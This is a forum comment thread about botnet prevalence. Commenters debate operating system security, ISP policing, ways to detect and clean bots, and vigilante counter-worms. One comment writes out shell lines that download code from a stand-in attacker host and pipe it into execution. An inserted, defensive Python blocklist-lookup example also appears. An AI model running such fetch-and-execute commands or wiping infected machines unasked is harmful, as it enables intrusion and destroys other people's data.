25 Percent of All Computers in a Botnet?

Zonk posted more than 7 years ago | from the you-might-be-one-of-them dept.

Security 408

Beckham's_Ponytail writes to mention an Ars Technica article, with some disturbing news out of the World Economic Forum in Davos, Switzerland. Vint Cerf, one of the 'fathers of the internet', has stated that the number of botnets online is larger than believed. So large, in fact, that he estimates that at this point one in four computers is infected with botnet software. We've discussed the rise of botnets numerous times here on Slashdot, but the image of 150 million infected computers is more than a little bit sobering. With the extremely lucrative activities that can be done with botnets (such as password ripping, spamming, DDoSing), as well as reports of organized crime adopting 'cyber-terrorism' as a new line of income, is it likely that law enforcement will ever be able to curb this particular bane?

408 comments

How to stop the bots (0, Troll)

ProteusQ (665382) | more than 7 years ago | (#17777188)

Pass a law making it illegal to connect any OS to the internet that cannot be made bot-free.

Re:How to stop the bots (1)

BSAtHome (455370) | more than 7 years ago | (#17777348)

I guess annoying users by imposing a $1000,- tax per month on owning a computer is more effective. Then maybe the refrigerator will finally stay off of the net.

Re:How to stop the bots (2, Insightful)

Score Whore (32328) | more than 7 years ago | (#17777392)

Presumedly every OS can be bot-free. I mean it's not like they come pre-installed.

If you mean permanently bot-free, then it's going to be an empty internet because every OS has security issues.

Re:How to stop the bots (1)

Anonymous Coward | more than 7 years ago | (#17777402)

Or take privilege separation to its extreme and shield programs from each other. So you compromised the mail program? Great, you can't save an executable and your worm will be erased when the program is closed.
(Murphy's law says programs will have bugs. So assume they will.)

Re:How to stop the bots (1)

Nutria (679911) | more than 7 years ago | (#17777410)

Pass a law making it illegal to connect any OS to the internet that cannot be made bot-free.

"Made bot-free"? Reinstalling Windows makes it bot-free.

No, there has to be a NIST standard test for determining how many bots infect an operating system in 2 hours of "typical" surfing. (Determining what "typical" is, and preventing MSFT from corrupting the test are the hard parts.)

Then, pass a law saying that network-providers can not let those OSs connect to their networks.

Re:How to stop the bots (1)

Score Whore (32328) | more than 7 years ago | (#17777594)

...how many bots infect an operating system in 2 hours of "typical" surfing.
For "typical" surfing, pretty much any OS will survive days without any kind of issue. It's things like people double-clicking on the "TheKids.jpg(.exe)" that they received from their friends that cause most of the problems. Or installing "iTunres4Free.exe". Or downloading and installing the latest "Britney's Titties See-thru.scr". This shit is almost entirely self-inflicted. And it'd be the same whatever the OS. As soon as critical mass is reached the asshats and scam artists will give their full attention.

Re:How to stop the bots (1)

Yvanhoe (564877) | more than 7 years ago | (#17778122)

Reinstalling Windows makes it bot-free.

I have XP installation CDs. Not SP2, XP barebone. I had to reinstall. I made it once. I got Blaster in less than 5 minutes. Then I installed it again, this time with the network unplugged. I don't know how I could have downloaded the service pack without a knoppix CD at hand...

Re:How to stop the bots (5, Interesting)

x_MeRLiN_x (935994) | more than 7 years ago | (#17777414)

25% does seem a little high, but then again it's not hard to imagine that people who this affects don't talk with too many people online who they haven't met in person. Just today I was playing Counter-Strike (1.6 of course) and a fellow player revealed the reason for them not moving or shooting; a pop-up. This is hardly a rare occurrence. I can't empathise in any way with those who are perfectly content to accept their computer is infected with some sort of adware and believe there is nothing they can do to prevent the infection of such malware.

Re:How to stop the bots (1)

Ant P. (974313) | more than 7 years ago | (#17777694)

Congratulations! You just outlawed anything capable of running a CGI script.

Re:How to stop the bots (1)

techno-vampire (666512) | more than 7 years ago | (#17777732)

And how is that going to affect computers in other countries? Do you really expect every, single nation in the world to pass a law like that?

That will only force everybody to buy vista (0)

Anonymous Coward | more than 7 years ago | (#17777824)

While XP on back really can not be secured (at least that is what is claimed by BG and all of the top ppl of MS), Vista is re-designed with no known major design issues. So it can be connected. Of course, the reality is CAN anybody prove that any OS is guaranteed to be bot-free? Nope. Nada. nyet. Nein. It is mathematically impossible to guarantee that.

EVEN MORE SCARY it's 1 in 2 windows computers. (4, Interesting)

goombah99 (560566) | more than 7 years ago | (#17777862)

It says 1 in 4 are infected. But let's drill down. First take out all the mac and linux and Unix computers since the botnet rate, while not zero, is probably not significant. We can also exclude most but not all embedded systems. Since mac and linux and Unix, and embedded systems account for more than a quarter of the market this means that most Windows computers are infected at a rate closer to 1 in 3.

Next remove all the server clusters and the majority of computers in highly active IT business environments. We can probably exclude most military computers. That takes out another quarter of the machines.

So basically your personal computer at home or poorly maintained business machines are carrying the bulk of the infection and it's not entirely way off to say the botnet rate is 1 in 2 for windows.

Re:EVEN MORE SCARY it's 1 in 2 windows computers. (1)

Archeopteryx (4648) | more than 7 years ago | (#17778006)

I bet the Windows and Linux rate IS zero unless Word Macro Botnets exist.

Re:EVEN MORE SCARY it's 2 in 1 windows computers. (4, Funny)

spun (1352) | more than 7 years ago | (#17778104)

Actually, you have not taken this analysis far enough. Next you must remove all computers owned by cats, as cats are fastidious animals, and as natural hunters quite concerned with security. My research says 10% of all windows computers are owned by cats.

Next, you can't count windows computers that have been smashed with sledgehammers. If you can't figure out why, I pity you. My research says that 17.54979% of all windows computers have been smashed with sledgehammers.

Also, it would be ridiculous to count computers that have been taken over by Skynet. Technically, they ARE part of a botnet, but this is really a separate, and very real, very important issue. Here, my research indicates over 1/4 of all windows computers are now part of skynet, so we have to count those out.

As everyone knows, there are a significant number of aliens present on the planet, and a significant number of them are silicon based life forms posing as high end windows computers while they pursue research for their doctoral dissertations on the common homo-sapien couch potato. This amounts to about 22% of windows computers.

We can therefore conclude that, if I've done my math right, 2 out of every 1 windows computer is part of a botnet!

Re:EVEN MORE SCARY it's 2 in 1 windows computers. (4, Funny)

Kelson (129150) | more than 7 years ago | (#17778156)

My research says 10% of all windows computers are owned by cats.

Judging by some blogs I've seen, I suspect you're right.

woof (4, Funny)

goombah99 (560566) | more than 7 years ago | (#17778160)

The nice thing about the internet is no one knows you're a dog.

Teenage Drivers (2, Interesting)

goombah99 (560566) | more than 7 years ago | (#17778010)

Insurance rates on teenage drivers are higher. We don't say all cars must be accident free but we recognize group risks are higher for some identifiable groups. Insurance rates are higher if you own a race car.

ISP connection fees should be regulated so that if you own a windows computer you are treated as astronomically more likely to poison the internet than if you don't.

Note I'm not saying that windows machines pay more because there are more windows botnets. That would not be fair since there are more windows machines out there so naturally they have more instances of botnets. The second thing is that windows bots hurt other windows users more than they hurt the rest of us. So they can't be penalized for that either.

What I am saying is that
1) per capita windows machines have more bots than other systems
2) that bots don't just hurt windows users but do affect others.

Re:How to stop the bots (0)

Anonymous Coward | more than 7 years ago | (#17778098)

Wouldn't it make more sense to fine companies that sell inherently insecure OS's?

I mean, after all, they are making money off of it. Although I wouldn't go as far as to say that Bill Gates and company fund the writers of botnets, spyware, adware etc. I figure that they secretly love these guys for forcing people onto the continuous upgrade path that keeps Microsoft in the money.

Just recently my company has been hit by a coupla trojans that spread through our network. The only computers affected were the win2k machines, all XP machines seem to be immune. The head IT guy's comment: "I guess I better rush the deployment of XP through the rest of our computers." That's gotta be music to Microsoft's ears!

Re:How to stop the bots (1)

thegsusfreek (769912) | more than 7 years ago | (#17778146)

But who is going to enforce this law?

Botnets (5, Funny)

eviloverlordx (99809) | more than 7 years ago | (#17777208)

Just wait until they merge and become Skynet. Then we'll really be in trouble.

Re:Botnets (5, Funny)

Sabaki (531686) | more than 7 years ago | (#17777776)

The Terminator: The Spamnet goes on-line August 4th, 1997. Human decisions are removed from strategic marketing. Spamnet begins to grow at a geometric rate. It becomes self-aware at 2:14 a.m. Eastern time, August 29th. In a panic, they try to pull the plug.
Sarah Connor: Spamnet fights back.
The Terminator: Yes. It launches its nigerian spam against the targets in Russia.
John Connor: Why attack Russia? Aren't they spammers too?
The Terminator: Because Spamnet knows the Russian counter-spam will eliminate all non-zombies over here.

Dr. Silberman: I'm sure it feels very real to you.
Sarah Connor: On August 29th, 1997, it's gonna feel pretty fscking real to you too. Anybody not handling 2 million messages a second is gonna have a real bad day. Get it?

Request (1)

Gabrill (556503) | more than 7 years ago | (#17777216)

Does anyone know a utility/website for detecting and cleaning bots?

Sorry no (-1, Troll)

Anonymous Coward | more than 7 years ago | (#17777244)

Why not try a browser better than IE, an OS other than Windows and some common sense?

Re:Sorry no (0)

Anonymous Coward | more than 7 years ago | (#17777588)

Try to be more constructive you sanctimonious asshole (parent AC).

Re:Request (3, Informative)

beakerMeep (716990) | more than 7 years ago | (#17777312)

I think a bot is just a virus/trojan/rootkit in terms of detection/removal. I think it's named "bot" more because of its function. ex: sleeping and waiting for commands from the bad guy to start spamming email.

Re:Request (3, Insightful)

99BottlesOfBeerInMyF (813746) | more than 7 years ago | (#17777398)

Does anyone know a utility/website for detecting and cleaning bots?

There are lots of tools for detecting bots; as for cleaning them, well that depends upon the environment I suppose. ISPs have tools for detecting likely bots, but generally don't have the authority or motivation to do anything. Large organizations like universities and corporations have tools for detecting bots and taking them offline until they are fixed. How does one go about cleaning bots though? Do you wipe boxes before you know what is on them? That is the only sure way to rid a box of malware since you have no idea what else is on it.

The first question that needs to be answered is what type of network do you want to clean bots from? The next is, how much control do you have over the machines?

Re:Request (4, Insightful)

rtb61 (674572) | more than 7 years ago | (#17777942)

The major ISPs are the problem. They certainly can detect and clean it up but there is no profit in it, whilst there is a significant cost, not only in running the software to detect the suspicious activity on their networks but then informing the customer, assisting the customer in cleaning up their computer (they will demand it), then disconnecting the customers until they clean up their computer, then reconnecting the customer and repeating when the customer gets re-infected. The ISP I use do monitor their network for suspicious bot like activity and will inform their customers about problems and should the customer fail to clean up their computer, disconnect them but they are a quality ISP and sadly in the minority when it comes to putting quality of service ahead of that extra few percent of profit.

This is what you get as the result of profit first corporations, everybody else pays the costs and that cost often far exceeds (by a factor of thousands) the increase in profit that some asshat corporate executive wet dreams over.

Re:Request (0, Troll)

thewils (463314) | more than 7 years ago | (#17777634)

Here ya go

Try this [ubuntu.com]

Sorry, I just had to do it.

Re:Request (5, Informative)

bigberk (547360) | more than 7 years ago | (#17777678)

One interesting method is to query an anti-spam database using your IP address, and see if you are listed as a spam source. Quick checks can be done at robtex [robtex.com] or dnsstuff [dnsstuff.com] .

If your IP address shows up on PSBL [surriel.com] , CBL [abuseat.org] , SpamCop [spamcop.net] , or WPBL [wpbl.info] your host is probably infected and a source of spam or other abuse.
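The blocklist lookup described in the comment above, as an added example that is not part of the original post: a DNSBL is queried by reversing the address, appending the list's zone, and resolving the result, where an answer in 127.0.0.0/8 means "listed" and NXDOMAIN means "not listed". The zone names, the sample address and the stand-in resolver are constructed placeholders; take real zone names from each list's own documentation. The sketch also covers IPv6 nibble format, which goes beyond the comment.

```python
import ipaddress
import socket

# Ranges that never show up as a traffic source on the public internet.
# A machine behind NAT has to look up its public address, not one of these.
NON_PUBLIC = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",  # RFC 1918
    "100.64.0.0/10",                                   # carrier-grade NAT
    "127.0.0.0/8", "169.254.0.0/16",                   # loopback, link-local
    "::1/128", "fe80::/10", "fc00::/7",                # IPv6 equivalents
)]

# DNSBLs signal a listing with an A record inside 127.0.0.0/8.
LISTED_RANGE = ipaddress.ip_network("127.0.0.0/8")


def dnsbl_query_name(ip, zone):
    """Build the DNS name to resolve for `ip` in blocklist `zone`."""
    addr = ipaddress.ip_address(ip)
    if any(addr.version == n.version and addr in n for n in NON_PUBLIC):
        raise ValueError(f"{ip} is not a public address; look up your WAN IP")
    # reverse_pointer gives e.g. "7.113.0.203.in-addr.arpa" (IPv4) or
    # 32 reversed nibbles plus ".ip6.arpa" (IPv6); drop the arpa suffix.
    rev = addr.reverse_pointer
    for suffix in (".in-addr.arpa", ".ip6.arpa"):
        if rev.endswith(suffix):
            rev = rev[: -len(suffix)]
    return f"{rev}.{zone.strip('.')}"


def check_dnsbl(ip, zones, resolve=socket.gethostbyname):
    """Return {zone: verdict} for `ip`; `resolve` is injectable for testing."""
    no_such_name = {socket.EAI_NONAME, getattr(socket, "EAI_NODATA", None)}
    results = {}
    for zone in zones:
        name = dnsbl_query_name(ip, zone)
        try:
            answer = resolve(name)
        except socket.gaierror as exc:
            # NXDOMAIN is the normal "clean" result; anything else
            # (timeout, SERVFAIL) tells us nothing about the address.
            results[zone] = ("not listed" if exc.errno in no_such_name
                             else "lookup failed")
            continue
        if ipaddress.ip_address(answer) in LISTED_RANGE:
            results[zone] = "listed"
        else:
            # A resolver that rewrites NXDOMAIN to a search page would
            # otherwise make every address look listed.
            results[zone] = "invalid answer"
    return results


def demo():
    """Run the check against a constructed, offline stand-in for DNS."""
    fake_dns = {
        "7.113.0.203.list-a.example": "127.0.0.2",      # listed
        "7.113.0.203.list-c.example": "198.51.100.20",  # hijacked answer
    }

    def fake_resolve(name):
        if name in fake_dns:
            return fake_dns[name]
        raise socket.gaierror(socket.EAI_NONAME, "Name or service not known")

    zones = ["list-a.example", "list-b.example", "list-c.example"]
    return check_dnsbl("203.0.113.7", zones, resolve=fake_resolve)


if __name__ == "__main__":
    for zone, verdict in demo().items():
        print(f"{zone}: {verdict}")
```

A listing only reflects what that list's sensors saw from the address; on a shared or dynamic IP it may describe a previous holder or another machine behind the same router.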

The rub... (2, Insightful)

Eric Damron (553630) | more than 7 years ago | (#17777840)

The real rub is that if your PC is infected with a halfway decent bot you'll never know it unless you monitor the outbound traffic.

A good bot will install a root kit that will disable and/or lie to anti-virus software.

Re:Request (1)

Phroggy (441) | more than 7 years ago | (#17778036)

Bots are basically just viruses and spyware, with a payload. Pretty much any time you hear about a new virus or worm, it turns your PC into a spam zombie, but nobody ever bothers to mention that detail.

Try AdAware [download.com] , and your favorite antivirus software.

Re:Request (4, Informative)

sporkme (983186) | more than 7 years ago | (#17778060)

Does anyone know a utility/website for detecting and cleaning bots?
I use a can of airduster, a cotton swab and an alcohol solution to clean my bots.

There are a bunch of port scanner sites out there that can check the integrity of your firewall. DSL Reports has a decent one if memory serves. Use Spybot Search & Destroy, LavaSoft AdAware and a good antivirus like AVG or Avast. If you suspect that there is unwanted network traffic to and from your system, use Ethereal to see where it is going to and coming from. If you suspect an exploit of Internet Explorer, HijackThis can shed some light on it. Check the task manager process tab for suspicious looking entries and Google them. Lay off the pr0n! and v1agr@ emails.

By far the most powerful and versatile utility is The Geek Down The Street (TM), possibly surpassed by Your Local Computer Repair Shop (TM). Ultimately, there is no replacement for smart practices and secure software. Use an alternative browser like Firefox or Opera, or better yet pop on over to http://www.linux.org/dist/ [linux.org] and take your pick.

Re:Request (2, Funny)

Anonymous Coward | more than 7 years ago | (#17778142)

Sure. The following utility will detect a botnet member:

    #!/bin/sh
    [ -d /WINDOWS ] && echo "Am a bot"

If you're on Windows, you might need to install cygwin first before running it. Works really well.

Just install linux (0, Redundant)

len_p (782308) | more than 7 years ago | (#17777232)

Just install linux or other unix'es and it's solved. Start by convincing your friend to buy MS free computers. After 2 weeks of struggle to lose the old habits they will get used and thank you for it. www.len.ro

Re:Just install linux (0)

Anonymous Coward | more than 7 years ago | (#17777320)

It is possible to have a *nix box taken over by a bot. Not as likely as a windows machine, but still it is possible.

Re:Just install linux (1)

BSAtHome (455370) | more than 7 years ago | (#17777420)

However, it is much harder to do it effectively. If it is 10 times harder to take over a *nix box than a MS box, then you have decimated the bot threat in a simple way.

Re:Just install linux (0)

Anonymous Coward | more than 7 years ago | (#17777324)

It will take more than 2 weeks to get used to not being able to game anymore.

Rolls eyes til they pop out

Re:Just install linux (3, Insightful)

nuclearpenguins (907128) | more than 7 years ago | (#17777354)

Until they want to play the latest and greatest games. Then what? And don't give me the emulator lines, I'm talking out of box ready to play. You will not get rid of Windows, face that fact. The trick is to educate people on how to better protect their Windows machines against such things.

Re:Just install linux (4, Insightful)

SCHecklerX (229973) | more than 7 years ago | (#17777538)

botnets on *nix are easy. Most on windoze are deployed via idiot lusers just like most other malcode.

On linux, you only need a script that does the equivalent of this:

malcode < /dev/tcp/h4xx0rsbox/80
Or, if you have netcat available to you and prefer to use that tool:

nc h4xx0rsbox 80 | malcode
Or just include all the tcpip stuff in the trojan the idiot linux luser runs. It's easy enough to add it to their .profile or .shellrc, so it runs every time they log in, right?

These things aren't after your own files and such. They are after your network resources, and these are trivial to get, even on *nix, my friend. When linux is popular amongst the idiots who run everything that they are sent or directed to download, they will certainly run it on that platform. And doing this stuff on linux is far more trivial than doing it on windoze thanks to the standard 'dev' tools and shells that are pretty much guaranteed to be available to the attacker.

Re:Just install linux (0)

Anonymous Coward | more than 7 years ago | (#17777924)

Or just include all the tcpip stuff in the trojan a normal person who is also using linux runs.
Corrected for you.

Sheesh, people are just so arrogant these days. *sigh*

Re:Just install linux (2, Funny)

The_Wilschon (782534) | more than 7 years ago | (#17777614)

Just install linux or other unix'es and it's solved. Start by convincing your friend to buy MS free computers. After 2 weeks of struggle to lose the old habits they will get used and thank you for it.
Wait. I thought the point of getting them to switch was so that they wouldn't get used.

Use the poison as the cure. (3, Insightful)

purpledinoz (573045) | more than 7 years ago | (#17777238)

Isn't there a way to develop a virus that can spread through these compromised computers, but instead of doing the damage, it fixes the leaks? These compromised computers have some sort of back-door left open right?

Re:Use the poison as the cure. (1)

yo_tuco (795102) | more than 7 years ago | (#17777318)

"back-door left open right?"

Good play on words.

Re:Use the poison as the cure. (1, Interesting)

Anonymous Coward | more than 7 years ago | (#17777548)

Theoretically, the bot authors can just use public key encryption so that if the virus key doesn't match, the bot doesn't execute the program. In practice, they don't yet (I think), but if counterhacking becomes a problem, you'll bet they'll move to it quickly.

But then, maybe just DOSing the bot will work (since checking public key signatures is computationally expensive). As a "bonus", the user may notice that he's in a botnet because all his bandwidth and/or CPU power is being tied up.

Ramen worm (3, Informative)

TypoNAM (695420) | more than 7 years ago | (#17777624)

Like the ramen worm that affected most Redhat systems and then disabled the exploits it used? http://news.com.com/2009-1001-251311.html [com.com]

Re:Use the poison as the cure. (0)

Anonymous Coward | more than 7 years ago | (#17778094)

I've thought of doing this too. It may be possible to crack a spam trojan and turn it into a worm that just sits there and serves itself to the rest of the botnet as an update (while reporting back to mr. spammer that everything is fine). When it hits its peak infection count, they all self-destruct.

And (0)

Anonymous Coward | more than 7 years ago | (#17777242)

How many of the botnets are Windows boxes? 99.9%, no doubt, which is a greater percent than their installed base.

25%? BS.... (5, Funny)

Karganeth (1017580) | more than 7 years ago | (#17777264)

95% of all statistics are made up on the spot. Luckily, this statistic is one of the few 9% of statistics which aren't made up so quickly.

Would killing individual bots be unethical? (0)

not-enough-info (526586) | more than 7 years ago | (#17777290)

If you can correctly identify zombies in a botnet, would it be unethical to break into them to kill them (erase the HD, trash the system, whatever to take it down)? Seeing as how the user doesn't care or know that his machine is not under his control why not just force them to reformat it or buy a new one? You could even have it look for others to kill before it self-destructs.

Doesn't care or doesn't know? (0)

Anonymous Coward | more than 7 years ago | (#17777442)

I had my mother who was literally computer illiterate using xubuntu for a while but one of the sites she relied on used flash 9. Sure it's easy to say screw that site for using something that wasn't available for linux up until a few days ago but this particular site was about 90% of her online activity.

So I gave her a laptop that had WinXP preloaded. I've educated her on the pitfalls of windows but keep in mind this is a person who has never used a computer. Email and surfing the web are completely new concepts for her.

I check it out every time I'm over to make sure it's clean but I fear it's only a matter of time when she misclicks something.

Now that flash 9 has come out for linux I had considered switching her back but I'm not sure how willing she'd be to make another switch. She surely wouldn't understand why she needed to switch.

Re:Doesn't care or doesn't know? (2, Insightful)

abigor (540274) | more than 7 years ago | (#17777582)

She won't get infected with anything if:

1. She is behind a router, like a cheapo Linksys or something, so her ip is not routable over the wan.

2. She doesn't use IE.

3. She has auto-updates turned on.

I've had my similarly illiterate mom on such a setup for several years now, and she's never been infected.

Re:Doesn't care or doesn't know? (2, Informative)

morgan_greywolf (835522) | more than 7 years ago | (#17777778)

s/IE/IE or Outlook/ and I would mostly agree with you, but not completely. Plenty of other software people install themselves from the Web either includes spyware or is spyware itself. Remember Bonzi Buddy? What illiterate mom/little sister/etc. could resist the cute purple monkey?

More recently, there have been programs claiming to be spyware removers that are spyware themselves!

Not a question of ethics (0)

Anonymous Coward | more than 7 years ago | (#17777444)

If a homeowner doesn't care that there's a cannon set up on their lawn spraying shit over their neighbors; would it be unethical to destroy their house? I don't think it would but it would still be illegal.

Re:Not a question of ethics (0)

Anonymous Coward | more than 7 years ago | (#17777782)

So, rather than walk over and plug the barrel of the cannon (to use your analogy), you'd call in an air strike on the whole house? Holy over-reaction, Batman!

To use a medical analogy, you need to work on removing a parasitic infection, not shooting the patient in the head. Until that distinction is clear to you, you need to put down your keyboard and slowly back away.

Re:Not a question of ethics (1)

BewireNomali (618969) | more than 7 years ago | (#17778108)

good night and good luck.

Re:Would killing individual bots be unethical? (0)

Anonymous Coward | more than 7 years ago | (#17777542)

Does murdering the victim of a rape crime sound unethical?

Re:Would killing individual bots be unethical? (1)

multipartmixed (163409) | more than 7 years ago | (#17777698)

I don't know... if you can correctly identify persons about to become rapists in a park, would it be unethical to kill them (erase their brain, castrate them, whatever to make it not happen?).

Re:Would killing individual bots be unethical? (1)

John Hasler (414242) | more than 7 years ago | (#17777864)

Bad analogy. He is not proposing to do anyone bodily harm.

Better, though, would be to disable the bot and notify both the owner of the computer and the ISP.

Another possibility: a worm that just detects bots and notifies a server. This would give you a list of IPs that you could do all sorts of interesting things with.

Re:Would killing individual bots be unethical? (1)

spun (1352) | more than 7 years ago | (#17777874)

I don't know... if you can correctly identify persons that are rapists in a park, would it be unethical to kill them (erase their brain, castrate them, whatever to make it not happen?).

There, fixed that for you. This isn't about computers that might become zombies in a botnet, it's about those that already are. I'm still unsure of the ethics, but let's compare apples to apples rather than getting all hysterical, bringing emotionally charged situations into the conversation and making false analogies.

Re:Would killing individual bots be unethical? (1)

El Torico (732160) | more than 7 years ago | (#17777858)

Trashing botted PCs?
Ethical - yes.
Legal - no.
Fun - oh hell yeah.

And so it begins (1)

shirizaki (994008) | more than 7 years ago | (#17777338)

Skynet, the end of the world, and the world being overrun with AH-nold robots.

.....Let's hope they run Windows ME, so we have a chance of survival.

Re:And so it begins (1)

HTH NE1 (675604) | more than 7 years ago | (#17778064)

Skynet, the end of the world, and the world being overrun with AH-nold robots. .....Let's hope they run Windows ME, so we have a chance of survival.
They run on 6502 processors and DOS 3.3 formatted 5.25" floppy disks. You can tell by the Read/Write Track Sector assembly code that keeps popping up in their heads-up display.

Or at least they run an emulator for them.

Law enforcement? (3, Interesting)

countSudoku() (1047544) | more than 7 years ago | (#17777358)

Why not start with the ISPs? Have them start policing their own customers and shut off their connections when a compromised system is discovered, then help that poor, unconnected shmuck clean their PC so they can rejoin the world wide pr0n.

I spent two frickin' hours cleaning and protecting my sister's and niece's XP laptops over xmas. Pain in the ass, but at least they're running clean and happy now. This is after I said I'd never help them because they made the mistake of buying XP laptops instead of Macs. What can you do? Gotta clean it, even if it's partially the cause of the problem and the people using them are not of the highest technical ilk.

Re:Law enforcement? (3, Funny)

Kufat (563166) | more than 7 years ago | (#17777638)

I got a call from Road Runner a few years ago, when my younger brother had inadvertently set up an open relay. The conversation went like this:

Me: Y'see, my brother just installed Linux, and...
RR Tech: And now he thinks he's Net God?

Re:Law enforcement? (2, Insightful)

Anonymous Coward | more than 7 years ago | (#17777654)

> I spent two frickin' hours cleaning and protecting my sister's and niece's XP laptops over xmas.

Tell them to fuck off or they'll start expecting it. If you must do it, charge an hourly rate equivalent to a mechanic.

The Microsoft monopoly relies on schmucks like us freely donating our time to clearing up their shit. Put a $50/hour charge on your time and let Microsoft bask in the overdue respect they deserve.

Re:Law enforcement? (1)

Fez (468752) | more than 7 years ago | (#17777676)

Why not start with the ISPs? Have them start policing their own customers and shut off their connections when a compromised system is discovered, then help that poor, unconnected shmuck clean their PC so they can rejoin the world wide pr0n.
That's already standard practice for us, to some extent. When we find out about a compromised customer, we issue a warning and if they do not respond or we get more complaints, we shut them down. Maybe twice in the last several years have we had to actually shut someone down. Usually when we tell them, they are more than happy to get it cleaned up because they had no idea anything was wrong (Or "I thought I'd been getting a lot of popups lately" or "it has been rather slow", etc.)

We also happen to be a PC repair shop, so we encourage them to bring it to us so we can be sure it is clean (Have to be careful with that, since they might think *we* did it...)

Unfortunately with all the bots being so different there's no easy way to scan for them that I'm aware of (I'd LOVE to be proven wrong on that!)

To solve a problem, you have to go to the source (0)

JoeWalsh (32530) | more than 7 years ago | (#17777362)

The only way they'll ever solve this one is to go to the source: Microsoft. Once that beast is no longer producing the tools criminals need, the Internet will be safe.

Re:To solve a problem, you have to go to the sourc (1)

gijoel (628142) | more than 7 years ago | (#17777954)

You're right. The only way to be sure is to nuke it from orbit.

Me scared (2, Funny)

jurt1235 (834677) | more than 7 years ago | (#17777368)

That would mean that 75% of computers would not be infected, ergo that 75% of users finally got the clue of protecting their system against viruses and malicious websites. Is 75% running Linux without notifying the nerds? Hey, we nerds run the minority system here! I am switching to MS Windows right now.

(Another statistics victim)

If you include routers, switches, fridges, printer (1)

WillAffleckUW (858324) | more than 7 years ago | (#17777380)

maybe this might be possible.

More likely is a statistic that said more than 25 percent of all IP addresses have at least one CPU behind them which is part of a botnet.

That might be true.

Bogus Numbers (5, Insightful)

madsheep (984404) | more than 7 years ago | (#17777386)

I would be much more inclined to believe that 1 in 4 PC's are infected with one or more of the following:

- Virus
- Trojan
- Worm
- Spyware
- Adware

A few of the above are used almost interchangeably (by some people) and have the capability of effectively making the machine into some form of a bot or zombie (remotely controlled or not). Now, to say that 1 in 4 machines are bots I would have to wholeheartedly disagree with. This just isn't very likely. Especially since the lifetime of a specific botnet has gradually been decreasing. Faster AV responses, increased patching, and more bot competition will inherently decrease these odds. Sorry but the daddy of the internet or not.. I think he's off the mark.

Re:Bogus Numbers (1)

JustNiz (692889) | more than 7 years ago | (#17777496)

... and what about those large-majority millions of non-technical users that connect their old Windows 98 PCs straight in to their cable modem, and don't bother with/have never heard of antivirus software?

Re:Bogus Numbers (3, Funny)

John Hasler (414242) | more than 7 years ago | (#17777648)

> ...don't bother with/have never heard of antivirus software?

They have antivirus software. It came with the computer when they bought it four years ago.

Re:Bogus Numbers (2, Interesting)

99BottlesOfBeerInMyF (813746) | more than 7 years ago | (#17777710)

> Now, to say that 1 in 4 machines are bots I would have to wholeheartedly disagree with. This just isn't very likely. Especially since the lifetime of a specific botnet has gradually been decreasing. Faster AV responses, increased patching, and more bot competition will inherently decrease these odds. Sorry but the daddy of the internet or not.. I think he's off the mark.

I haven't found any sources for the data he cites, but I just happen to have some data in front of me that represents a significant chunk of all internet traffic and the best estimates I have show about .5% of all traffic is botnet traffic. When active, bots send abnormally large amounts of traffic for a host, let's just say ten times as much to be very conservative. That would mean each bot would have to be actively spamming or sending an attack about 15 minutes a day on average assuming the 1 in 4 number he cites. Now these are really, really rough numbers, but that is not outside the realm of possibility.

I'll wait until I see real numbers and sources before judging his assertion.

Not only more, but smarter too ... (0)

Anonymous Coward | more than 7 years ago | (#17777396)

in fact, you've already been assimilated!

Where there's a will, there's a way (0, Troll)

gorbachev (512743) | more than 7 years ago | (#17777440)

So far there hasn't been any will to go after botnet operators. A few small time, unorganized crooks, who've been too stupid to cover their tracks properly, have been caught and convicted, but nobody is even thinking of going after the big fish operating from Russia.

In the "good old days" this problem would've been fixed in 10 seconds by cutting all of Eastern Europe off the net completely. Too bad it can't be done any more.

Imagine that (1)

ubergoober (151136) | more than 7 years ago | (#17777462)

My job has me traveling the country to troubleshoot and train on our company software. Considering almost 50% have both Google AND Yahoo toolbars installed... somehow I'm not surprised. Most don't even know how to use the toolbars at all.

South Korea? (5, Insightful)

garcia (6573) | more than 7 years ago | (#17777472)

With 99.9% of South Koreans "shackled" to Windows [slashdot.org] and "sitting behind fat pipes", why are we surprised?

I keep banning new IP ranges originating from .kr. It wouldn't surprise me at all if 99.5% of them were infected over there.

Accountability (2, Interesting)

DrLov3 (1025033) | more than 7 years ago | (#17777504)

Accountability !!!
If I leave my car unattended with all doors opened, engine running in front of a bank. If this bank gets robbed, and my car is used by the robber as a getaway car, I'm accountable in front of a judge ..... right ??!?!

Why not the same with computers left unprotected and unattended ?

Re:Accountability (2, Insightful)

doroshjt (1044472) | more than 7 years ago | (#17777570)

No, it's stealing; you're more likely to be considered an accomplice though. If you leave your house unlocked and someone comes in and shoots you in the head, are you responsible? No. If you wear a short skirt and low cut top and get raped, are you responsible? No. You can't blame the victim.

Re:Accountability (1)

John Hasler (414242) | more than 7 years ago | (#17777696)

> If I leave my car unattended with all doors opened, engine running in front of
> a bank. If this bank gets robbed, and my car is used by the robber as a
> getaway car, I'm accountable in front of a judge ..... right ??!?!

Not unless the prosecution can show that you were in on the robbery.

Cybercrime (4, Insightful)

mandelbr0t (1015855) | more than 7 years ago | (#17777518)

I wonder how up-to-date Law Enforcement is on Cybercrime, i.e. crimes that are perpetrated in Cyberspace. There's just so many things that place them at a disadvantage. First, there's often the argument that no crime has even been committed. The 'net is a wild and crazy place, and if you're on it, there's personal responsibility for protecting yourself against the constant background of malware. Most people haven't been educated in this respect.

Second, IP forensics is a rather arcane art. Few are schooled, even fewer are of the calibre that Law Enforcement would need on their side. I'd guess that it's still more lucrative to be on the wrong side of the law, and given the nebulous nature of many of these crimes, there's just not much attraction to being a computer cop. There is a process, if you're interested, to become an expert witness in this field. That's a step in the right direction, but it's only part of the overall legal process. We still need Law Enforcement officials who are willing to press charges and a judge who's willing to sign required warrants.

Finally, there's the anonymity factor. Even IP forensics won't get your man. It'll get you their IP address, but it's a long way from the IP address to the culprit. There's dozens of arguments which could explain why your Internet connection has been implicated in a Cybercrime, most of them raising reasonable doubt.

It's possible, however. "Where there's a will, there's a way." We have to take these crimes out of Cyberspace, and start correlating information between network and reality. After all, there's generally financial transactions associated with large spam deliveries and 10k+ botnet DDoSing. It's a lot harder to claim that you're a victim of circumstance when not only was your IP spotted crawling through an ISP's subnet in suspicious ways, but you also received a few grand just before a mysterious DDoS that brought down a major website.

Damn! (4, Funny)

Anonymous Coward | more than 7 years ago | (#17777556)

I've got 4 computers in my house... now I've got to figure out which one of them is part of a botnet!

Class action (3, Interesting)

